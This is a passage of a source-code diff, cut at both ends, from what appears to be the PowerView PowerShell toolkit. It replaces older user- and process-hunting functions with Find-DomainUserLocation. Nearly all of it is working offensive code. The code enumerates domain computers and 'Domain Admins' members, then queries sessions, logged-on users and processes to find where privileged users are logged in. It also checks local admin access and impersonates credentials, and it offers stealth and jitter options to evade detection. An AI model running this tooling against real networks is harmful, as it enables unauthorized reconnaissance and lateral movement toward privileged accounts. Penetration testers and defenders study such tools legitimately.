Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 + Write-Verbose "[New-ThreadedFunction] Total number of threads/partitions: $Threads" + + ForEach ($ComputerNamePartition in $ComputerNamePartitioned) { + # create a "powershell pipeline runner" + $PowerShell = [PowerShell]::Create() + $PowerShell.runspacepool = $Pool + + # add the script block + arguments with the given computer partition + $Null = $PowerShell.AddScript($ScriptBlock).AddParameter('ComputerName', $ComputerNamePartition) + if ($ScriptParameters) { + ForEach ($Param in $ScriptParameters.GetEnumerator()) { + $Null = $PowerShell.AddParameter($Param.Name, $Param.Value) + } } - Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" - $Counter = 0 - $RandNo = New-Object System.Random + # create the output queue + $Output = New-Object Management.Automation.PSDataCollection[Object] - ForEach ($Computer in $ComputerName) { + # kick off execution using the BeginInvok() method that allows queues + $Jobs += @{ + PS = $PowerShell + Output = $Output + Result = $Method.Invoke($PowerShell, @($Null, [Management.Automation.PSDataCollection[Object]]$Output)) + } + } + } - $Counter = $Counter + 1 + END { + Write-Verbose "[New-ThreadedFunction] Threads executing" - # sleep for our semi-randomized interval - Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + # continuously loop through each job queue, consuming output as appropriate + Do { + ForEach ($Job in $Jobs) { + $Job.Output.ReadAll() + } + Start-Sleep -Seconds 1 + } + While (($Jobs | Where-Object { -not $_.Result.IsCompleted }).Count -gt 0) - Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" - $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $TargetUsers, $CurrentUser, $Stealth, $DomainShortName, 0, 0, 0 - $Result + $SleepSeconds = 100 + Write-Verbose "[New-ThreadedFunction] Waiting $SleepSeconds seconds for final cleanup..." - if($Result -and $StopOnSuccess) { - Write-Verbose "[*] Target user found, returning early" - return - } + # cleanup- make sure we didn't miss anything + for ($i=0; $i -lt $SleepSeconds; $i++) { + ForEach ($Job in $Jobs) { + $Job.Output.ReadAll() + $Job.PS.Dispose() } + Start-Sleep -S 1 } + $Pool.Dispose() + Write-Verbose "[New-ThreadedFunction] all threads completed" } } -function Invoke-StealthUserHunter { - [CmdletBinding()] - param( - [Parameter(Position=0,ValueFromPipeline=$True)] - [Alias('Hosts')] - [String[]] - $ComputerName, +function Find-DomainUserLocation { +<# +.SYNOPSIS - [ValidateScript({Test-Path -Path $_ })] - [Alias('HostList')] - [String] - $ComputerFile, +Finds domain machines where specific users are logged into. - [String] - $ComputerFilter, +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction - [String] - $ComputerADSpath, +.DESCRIPTION - [String] - $GroupName = 'Domain Admins', +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and queries the domain for users of a specified group +(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the +function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon +The found user list is compared against the target list, and any matches are +displayed. If -ShowAll is specified, all results are displayed instead of +the filtered set. If -Stealth is specified, then likely highly-trafficed servers +are enumerated with Get-DomainFileServer/Get-DomainController, and session +enumeration is executed only against those servers. If -Credential is passed, +then Invoke-UserImpersonation is used to impersonate the specified user +before enumeration, reverting after with Invoke-RevertToSelf. - [String] - $TargetServer, +.PARAMETER ComputerName - [String] - $UserName, +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. - [String] - $UserFilter, +.PARAMETER Domain - [String] - $UserADSpath, +Specifies the domain to query for computers AND users, defaults to the current domain. - [ValidateScript({Test-Path -Path $_ })] - [String] - $UserFile, +.PARAMETER ComputerDomain - [Switch] - $CheckAccess, +Specifies the domain to query for computers, defaults to the current domain. - [Switch] - $StopOnSuccess, +.PARAMETER ComputerLDAPFilter - [Switch] - $NoPing, +Specifies an LDAP query string that is used to search for computer objects. - [UInt32] - $Delay = 0, +.PARAMETER ComputerSearchBase - [Double] - $Jitter = .3, +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. - [String] - $Domain, +.PARAMETER ComputerUnconstrained - [Switch] - $ShowAll, +Switch. Search computer objects that have unconstrained delegation. - [Switch] - $SearchForest, +.PARAMETER ComputerOperatingSystem - [String] - [ValidateSet("DFS","DC","File","All")] - $StealthSource ="All" - ) - # kick off Invoke-UserHunter with stealth options - Invoke-UserHunter -Stealth @PSBoundParameters -} +Search computers with a specific operating system, wildcards accepted. +.PARAMETER ComputerServicePack -function Invoke-ProcessHunter { -<# - .SYNOPSIS +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName - Query the process lists of remote machines, searching for - processes with a specific name or owned by a specific user. - Thanks to @paulbrandau for the approach idea. - - Author: @harmj0y - License: BSD 3-Clause +Search computers in the specific AD Site name, wildcards accepted. - .PARAMETER ComputerName +.PARAMETER UserIdentity - Host array to enumerate, passable on the pipeline. +Specifies one or more user identities to search for. - .PARAMETER ComputerFile +.PARAMETER UserDomain - File of hostnames/IPs to search. +Specifies the domain to query for users to search for, defaults to the current domain. - .PARAMETER ComputerFilter +.PARAMETER UserLDAPFilter - Host filter name to query AD for, wildcards accepted. +Specifies an LDAP query string that is used to search for target users. - .PARAMETER ComputerADSpath +.PARAMETER UserSearchBase - The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +Specifies the LDAP source to search through for target users. +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. - .PARAMETER ProcessName +.PARAMETER UserGroupIdentity - The name of the process to hunt, or a comma separated list of names. +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. - .PARAMETER GroupName +.PARAMETER UserAdminCount - Group name to query for target users. +Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged). - .PARAMETER TargetServer +.PARAMETER UserAllowDelegation - Hunt for users who are effective local admins on a target server. +Switch. Search for user accounts that are not marked as 'sensitive and not allowed for delegation'. - .PARAMETER UserName +.PARAMETER CheckAccess - Specific username to search for. +Switch. Check if the current user has local admin access to computers where target users are found. - .PARAMETER UserFilter +.PARAMETER Server - A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)" +Specifies an Active Directory server (domain controller) to bind to. - .PARAMETER UserADSpath +.PARAMETER SearchScope - The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). - .PARAMETER UserFile +.PARAMETER ResultPageSize - File of usernames to search for. +Specifies the PageSize to set for the LDAP searcher object. - .PARAMETER StopOnSuccess +.PARAMETER ServerTimeLimit - Switch. Stop hunting after finding after finding a target user/process. +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - .PARAMETER NoPing +.PARAMETER Tombstone - Switch. Don't ping each host to ensure it's up before enumerating. +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - .PARAMETER Delay +.PARAMETER Credential - Delay between enumerating hosts, defaults to 0 +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. - .PARAMETER Jitter +.PARAMETER StopOnSuccess - Jitter for the host delay, defaults to +/- 0.3 +Switch. Stop hunting after finding after finding a target user. - .PARAMETER Domain +.PARAMETER Delay - Domain for query for machines, defaults to the current domain. +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. - .PARAMETER DomainController +.PARAMETER Jitter - Domain controller to reflect LDAP queries through. +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 - .PARAMETER ShowAll +.PARAMETER ShowAll - Switch. Return all user location results. +Switch. Return all user location results instead of filtering based on target +specifications. - .PARAMETER SearchForest +.PARAMETER Stealth - Switch. Search all domains in the forest for target users instead of just - a single domain. +Switch. Only enumerate sessions from connonly used target servers. - .PARAMETER Threads +.PARAMETER StealthSource - The maximum concurrent threads to execute. +The source of target servers to use, 'DFS' (distributed file servers), +'DC' (domain controllers), 'File' (file servers), or 'All' (the default). - .PARAMETER Credential +.PARAMETER Threads - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target machine/domain. +The number of threads to use for user searching, defaults to 20. - .EXAMPLE +.EXAMPLE - PS C:\> Invoke-ProcessHunter -Domain 'testing' - - Finds machines on the 'testing' domain where domain admins have a - running process. +Find-DomainUserLocation - .EXAMPLE +Searches for 'Domain Admins' by enumerating every computer in the domain. - PS C:\> Invoke-ProcessHunter -Threads 20 +.EXAMPLE - Multi-threaded process hunting, replaces Invoke-ProcessHunterThreaded. +Find-DomainUserLocation -Stealth -ShowAll - .EXAMPLE +Enumerates likely highly-trafficked servers, performs just session enumeration +against each, and outputs all results. - PS C:\> Invoke-ProcessHunter -UserFile users.txt -ComputerFile hosts.txt - - Finds machines in hosts.txt where any members of users.txt have running - processes. +.EXAMPLE - .EXAMPLE +Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local - PS C:\> Invoke-ProcessHunter -GroupName "Power Users" -Delay 60 - - Find machines on the domain where members of the "Power Users" groups have - running processes with a 60 second (+/- *.3) randomized delay between - touching each host. +Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged +users in dev.testlab.local. - .LINK +.EXAMPLE - http://blog.harmj0y.net +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainUserLocation -Domain testlab.local -Credential $Cred + +Searches for domain admin locations in the testlab.local using the specified alternate credentials. + +.OUTPUTS + +PowerView.UserLocation #> - [CmdletBinding()] - param( - [Parameter(Position=0,ValueFromPipeline=$True)] - [Alias('Hosts')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.UserLocation')] + [CmdletBinding(DefaultParameterSetName = 'UserGroupIdentity')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] [String[]] $ComputerName, - [ValidateScript({Test-Path -Path $_ })] - [Alias('HostList')] + [ValidateNotNullOrEmpty()] [String] - $ComputerFile, + $Domain, + [ValidateNotNullOrEmpty()] [String] - $ComputerFilter, + $ComputerDomain, + [ValidateNotNullOrEmpty()] [String] - $ComputerADSpath, + $ComputerLDAPFilter, + [ValidateNotNullOrEmpty()] [String] - $ProcessName, + $ComputerSearchBase, + + [Alias('Unconstrained')] + [Switch] + $ComputerUnconstrained, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] [String] - $GroupName = 'Domain Admins', + $ComputerSiteName, + [Parameter(ParameterSetName = 'UserIdentity')] + [ValidateNotNullOrEmpty()] + [String[]] + $UserIdentity, + + [ValidateNotNullOrEmpty()] [String] - $TargetServer, + $UserDomain, + [ValidateNotNullOrEmpty()] [String] - $UserName, + $UserLDAPFilter, + [ValidateNotNullOrEmpty()] [String] - $UserFilter, + $UserSearchBase, + + [Parameter(ParameterSetName = 'UserGroupIdentity')] + [ValidateNotNullOrEmpty()] + [Alias('GroupName', 'Group')] + [String[]] + $UserGroupIdentity = 'Domain Admins', + + [Alias('AdminCount')] + [Switch] + $UserAdminCount, + + [Alias('AllowDelegation')] + [Switch] + $UserAllowDelegation, + + [Switch] + $CheckAccess, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $UserADSpath, + $Server, - [ValidateScript({Test-Path -Path $_ })] + [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] - $UserFile, + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, [Switch] $StopOnSuccess, - [Switch] - $NoPing, - - [UInt32] + [ValidateRange(1, 10000)] + [Int] $Delay = 0, + [ValidateRange(0.0, 1.0)] [Double] $Jitter = .3, - [String] - $Domain, - - [String] - $DomainController, - + [Parameter(ParameterSetName = 'ShowAll')] [Switch] $ShowAll, [Switch] - $SearchForest, + $Stealth, - [ValidateRange(1,100)] - [Int] - $Threads, + [String] + [ValidateSet('DFS', 'DC', 'File', 'All')] + $StealthSource = 'All', - [Management.Automation.PSCredential] - $Credential + [Int] + [ValidateRange(1, 100)] + $Threads = 20 ) - begin { - - if ($PSBoundParameters['Debug']) { - $DebugPreference = 'Continue' + BEGIN { + + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + $UserSearcherArguments = @{ + 'Properties' = 'samaccountname' + } + if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity } + if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter } + if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount } + if ($PSBoundParameters['UserAllowDelegation']) { $UserSearcherArguments['AllowDelegation'] = $UserAllowDelegation } + if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } + + $TargetComputers = @() + + # first, build the set of computers to enumerate + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = @($ComputerName) + } + else { + if ($PSBoundParameters['Stealth']) { + Write-Verbose "[Find-DomainUserLocation] Stealth enumeration using source: $StealthSource" + $TargetComputerArrayList = New-Object System.Collections.ArrayList + + if ($StealthSource -match 'File|All') { + Write-Verbose '[Find-DomainUserLocation] Querying for file servers' + $FileServerSearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $FileServerSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['ComputerDomain']) { $FileServerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerSearchBase']) { $FileServerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Server']) { $FileServerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $FileServerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $FileServerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $FileServerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $FileServerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $FileServerSearcherArguments['Credential'] = $Credential } + $FileServers = Get-DomainFileServer @FileServerSearcherArguments + if ($FileServers -isnot [System.Array]) { $FileServers = @($FileServers) } + $TargetComputerArrayList.AddRange( $FileServers ) + } + if ($StealthSource -match 'DFS|All') { + Write-Verbose '[Find-DomainUserLocation] Querying for DFS servers' + # # TODO: fix the passed parameters to Get-DomainDFSShare + # $ComputerName += Get-DomainDFSShare -Domain $Domain -Server $DomainController | ForEach-Object {$_.RemoteServerName} + } + if ($StealthSource -match 'DC|All') { + Write-Verbose '[Find-DomainUserLocation] Querying for domain controllers' + $DCSearcherArguments = @{ + 'LDAP' = $True + } + if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['ComputerDomain']) { $DCSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential } + $DomainControllers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname + if ($DomainControllers -isnot [System.Array]) { $DomainControllers = @($DomainControllers) } + $TargetComputerArrayList.AddRange( $DomainControllers ) + } + $TargetComputers = $TargetComputerArrayList.ToArray() + } + else { + Write-Verbose '[Find-DomainUserLocation] Querying for all computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + } + Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainUserLocation] No hosts found to enumerate' } - # random object for delay - $RandNo = New-Object System.Random - - Write-Verbose "[*] Running Invoke-ProcessHunter with delay of $Delay" + # get the current user so we can ignore it in the results + if ($PSBoundParameters['Credential']) { + $CurrentUser = $Credential.GetNetworkCredential().UserName + } + else { + $CurrentUser = ([Environment]::UserName).ToLower() + } - ##################################################### - # - # First we build the host target set - # - ##################################################### + # now build the user target set + if ($PSBoundParameters['ShowAll']) { + $TargetUsers = @() + } + elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) { + $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname + } + else { + $GroupSearcherArguments = @{ + 'Identity' = $UserGroupIdentity + 'Recurse' = $True + } + if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential } + $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName + } - # if we're using a host list, read the targets in and add them to the target list - if($ComputerFile) { - $ComputerName = Get-Content -Path $ComputerFile + Write-Verbose "[Find-DomainUserLocation] TargetUsers length: $($TargetUsers.Length)" + if ((-not $ShowAll) -and ($TargetUsers.Length -eq 0)) { + throw '[Find-DomainUserLocation] No users found to target' } - if(!$ComputerName) { - [array]$ComputerName = @() + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $TargetUsers, $CurrentUser, $Stealth, $TokenHandle) - if($Domain) { - $TargetDomains = @($Domain) - } - elseif($SearchForest) { - # get ALL the domains in the forest to search - $TargetDomains = Get-NetForestDomain -DomainController $DomainController -Credential $Credential | ForEach-Object { $_.Name } - } - else { - # use the local domain - $TargetDomains = @( (Get-NetDomain -Domain $Domain -Credential $Credential).name ) + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet } - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for hosts" - $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter $ComputerFilter -ADSpath $ComputerADSpath - } - - # remove any null target hosts, uniquify the list and shuffle it - $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } - if($($ComputerName.Count) -eq 0) { - throw "No hosts found!" - } - } + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + $Sessions = Get-NetSession -ComputerName $TargetComputer + ForEach ($Session in $Sessions) { + $UserName = $Session.UserName + $CName = $Session.CName - ##################################################### - # - # Now we build the user target set - # - ##################################################### + if ($CName -and $CName.StartsWith('\\')) { + $CName = $CName.TrimStart('\') + } - if(!$ProcessName) { - Write-Verbose "No process name specified, building a target user set" + # make sure we have a result, and ignore computer$ sessions + if (($UserName) -and ($UserName.Trim() -ne '') -and ($UserName -notmatch $CurrentUser) -and ($UserName -notmatch '\$$')) { - # users we're going to be searching for - $TargetUsers = @() + if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName)) { + $UserLocation = New-Object PSObject + $UserLocation | Add-Member Noteproperty 'UserDomain' $Null + $UserLocation | Add-Member Noteproperty 'UserName' $UserName + $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer + $UserLocation | Add-Member Noteproperty 'SessionFrom' $CName - # if we want to hunt for the effective domain users who can access a target server - if($TargetServer) { - Write-Verbose "Querying target server '$TargetServer' for local users" - $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object { - ($_.AccountName).split("/")[1].toLower() - } | Where-Object {$_} - } - # if we get a specific username, only use that - elseif($UserName) { - Write-Verbose "[*] Using target user '$UserName'..." - $TargetUsers = @( $UserName.ToLower() ) - } - # read in a target user list if we have one - elseif($UserFile) { - $TargetUsers = Get-Content -Path $UserFile | Where-Object {$_} - } - elseif($UserADSpath -or $UserFilter) { - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for users" - $TargetUsers += Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $UserADSpath -Filter $UserFilter | ForEach-Object { - $_.samaccountname - } | Where-Object {$_} - } - } - else { - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'" - $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController -Credential $Credential| ForEach-Object { - $_.MemberName + # try to resolve the DNS hostname of $Cname + try { + $CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName + $UserLocation | Add-Member NoteProperty 'SessionFromName' $CnameDNSName + } + catch { + $UserLocation | Add-Member NoteProperty 'SessionFromName' $Null + } + + # see if we're checking to see if we have local admin access on this machine + if ($CheckAccess) { + $Admin = (Test-AdminAccess -ComputerName $CName).IsAdmin + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin + } + else { + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null + } + $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation') + $UserLocation + } + } } - } - } + if (-not $Stealth) { + # if we're not 'stealthy', enumerate loggedon users as well + $LoggedOn = Get-NetLoggedon -ComputerName $TargetComputer + ForEach ($User in $LoggedOn) { + $UserName = $User.UserName + $UserDomain = $User.LogonDomain - if ((-not $ShowAll) -and ((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) { - throw "[!] No users found to search for!" - } - } + # make sure wet have a result + if (($UserName) -and ($UserName.trim() -ne '')) { + if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName) -and ($UserName -notmatch '\$$')) { + $IPAddress = @(Resolve-IPAddress -ComputerName $TargetComputer)[0].IPAddress + $UserLocation = New-Object PSObject + $UserLocation | Add-Member Noteproperty 'UserDomain' $UserDomain + $UserLocation | Add-Member Noteproperty 'UserName' $UserName + $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer + $UserLocation | Add-Member Noteproperty 'IPAddress' $IPAddress + $UserLocation | Add-Member Noteproperty 'SessionFrom' $Null + $UserLocation | Add-Member Noteproperty 'SessionFromName' $Null - # script block that enumerates a server - $HostEnumBlock = { - param($ComputerName, $Ping, $ProcessName, $TargetUsers, $Credential) - - # optionally check if the server is up first - $Up = $True - if($Ping) { - $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName - } - if($Up) { - # try to enumerate all active processes on the remote host - # and search for a specific process name - $Processes = Get-NetProcess -Credential $Credential -ComputerName $ComputerName -ErrorAction SilentlyContinue - - ForEach ($Process in $Processes) { - # if we're hunting for a process name or comma-separated names - if($ProcessName) { - $ProcessName.split(",") | ForEach-Object { - if ($Process.ProcessName -match $_) { - $Process + # see if we're checking to see if we have local admin access on this machine + if ($CheckAccess) { + $Admin = Test-AdminAccess -ComputerName $TargetComputer + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin + } + else { + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null + } + $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation') + $UserLocation + } } } } - # if the session user is in the target list, display some output - elseif ($TargetUsers -contains $Process.User) { - $Process - } } } - } - } - - process { - - if($Threads) { - Write-Verbose "Using threading with threads = $Threads" - - # if we're using threading, kick off the script block with Invoke-ThreadedFunction - $ScriptParams = @{ - 'Ping' = $(-not $NoPing) - 'ProcessName' = $ProcessName - 'TargetUsers' = $TargetUsers - 'Credential' = $Credential + if ($TokenHandle) { + Invoke-RevertToSelf } - - # kick off the threaded script block + arguments - Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } - else { - if(-not $NoPing -and ($ComputerName.count -ne 1)) { - # ping all hosts in parallel - $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} - $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet } + } + } - Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" - $Counter = 0 + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { - ForEach ($Computer in $ComputerName) { + Write-Verbose "[Find-DomainUserLocation] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainUserLocation] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + ForEach ($TargetComputer in $TargetComputers) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) - Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" - $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $ProcessName, $TargetUsers, $Credential - $Result + Write-Verbose "[Find-DomainUserLocation] Enumerating server $Computer ($Counter of $($TargetComputers.Count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetUsers, $CurrentUser, $Stealth, $LogonToken - if($Result -and $StopOnSuccess) { - Write-Verbose "[*] Target user/process found, returning early" + if ($Result -and $StopOnSuccess) { + Write-Verbose "[Find-DomainUserLocation] Target user found, returning early" return } } } + else { + Write-Verbose "[Find-DomainUserLocation] Using threading with threads: $Threads" + Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'TargetUsers' = $TargetUsers + 'CurrentUser' = $CurrentUser + 'Stealth' = $Stealth + 'TokenHandle' = $LogonToken + } + + # if we're using threading, 